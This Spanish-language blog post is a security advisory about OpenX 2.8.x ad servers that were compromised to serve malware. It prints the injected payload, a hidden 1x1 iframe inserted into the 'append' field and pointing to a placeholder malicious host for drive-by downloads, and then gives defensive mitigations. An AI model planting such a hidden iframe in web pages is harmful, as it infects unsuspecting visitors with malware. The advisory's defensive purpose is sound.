Malware a través de OpenX y dos soluciones para evitarlo

openx.jpg

Como muchos se habrán podido dar cuenta, hace unos días al visitar algunos de los blogs de Medios y Redes (incuyendo OpenSecurity) diversos navegadores de Internet mostraban una advertencia sobre que el sitio web en cuestión alojaba software malicioso. Este problema ya fue solucionado, y tal como se explicó en el blog corporativo, se debió a que OpenX, la plataforma con la que se gestionan campañas de publicidad de la red, fue infectada con un código malicioso.

Existe una vulnerabilidad en algunas versiones de OpenX 2.8.x que posibilita inyectar código en la base de datos de las campañas publicitarias. En este caso, se detectó que en el campo «append» fue insertado el siguiente iframe:

«<iframe src="http://sitio-web-malicioso/tds/in.cgi?default" width="1" height="1" hspace="0" vspace="0" frameborder="0" scrolling="no"></iframe>»

Este código se sirve junto con los anuncios de OpenX, y tiene la finalidad de descargar malware en el equipo del usuario. Lo más recomendable es actualizar a la última versión de OpenX, la cual al parecer cierra la vulnerabilidad, pero si por cualquier motivo no les es posible, pueden recurrir a estas dos soluciones:

  1. Verificar constantemente que el campo «append» no tenga código malicioso. No es algo muy efectivo si se hace de forma manual, pero se puede crear un script en cronjob que verifique cada cierto tiempo dicho campo y que nos alerte en caso de que encuentre código malicioso, de este modo podremos eliminarlo lo más pronto posible de la base de datos.
  2. En caso de que no se utilice, inhabilitar el campo «append». Para esto únicamente debemos editar el archivo «/www/delivery/ajs.php» de nuestra instalación de OpenX y en la línea 3227 reemplazar el fragmento de código «!empty($aBanner[‘append’]) ? $aBanner[‘append’] : »» por «$append=»»;«.

Esto no corrige la vulnerabilidad, pero por lo menos evita que se siga sirviendo el código malicioso a través de los anuncios de publicidad. En los foros de OpenX se puede ver que muchos usuarios se han visto afectados por este problema, así que si usan esta herramienta les recomendamos que tomen sus precauciones.

Scroll al inicio